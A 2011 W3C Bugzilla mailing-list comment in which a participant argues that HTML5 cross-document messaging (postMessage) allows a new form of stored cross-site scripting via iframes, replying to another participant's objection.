- From: <bugzilla@jessica.w3.org>
- Date: Wed, 13 Apr 2011 00:14:08 +0000
- To: public-html-bugzilla@w3.org
http://www.w3.org/Bugs/Public/show_bug.cgi?id=12469 --- Comment #13 from Simon <simon.young90@live.com> 2011-04-13 00:14:06 UTC --- Aryeh, You have not provided any comparison to the quote from my comment. You have simply just obscured the command document.write(‘’). Though your script could be injected into a webpage, it is not cross-site scripting but just plain old code injection. Besides, I have not mentioned obfuscation anywhere... I will try and briefly define/rephrase the exploit for you. Perhaps then you can go back to the top and re-read it. Prior to HTML5 and cross-document messaging, this method of cross-site scripting was not possible. By implementing XSS this way, you can make an exploit behave in a seemingly legitimate manner. What I mean by this in lose terms is: cross-document messaging is designed to behave this way, so in a stored attack (residing on the server and then being displayed to users) how do you distinguish between friend and foe? This method of attack also provides the potential to legitimately use multiple files from the external domain because the iFrames content is of the same origin. Then via the slave the external domain can also legitimately access files belonging to the exploited domain by providing appropriate instruction. In response to: <quote>It isn't enough to just list how your attack is different from previous attacks. For the attack to actually be the fault of postMessage(), it has to be something where no equivalent attack can be performed without using postMessage(), which is just not the case here.</quote> This is therefore a Cross-site scripting attack which completely conforms to the same-origin policy. This was not possible before cross-document messaging. And at the very least is a new way to implement an XSS attack. Simon -- Configure bugmail: http://www.w3.org/Bugs/Public/userprefs.cgi?tab=email ------- You are receiving this mail because: ------- You are the QA contact for the bug.
Received on Wednesday, 13 April 2011 00:14:11 UTC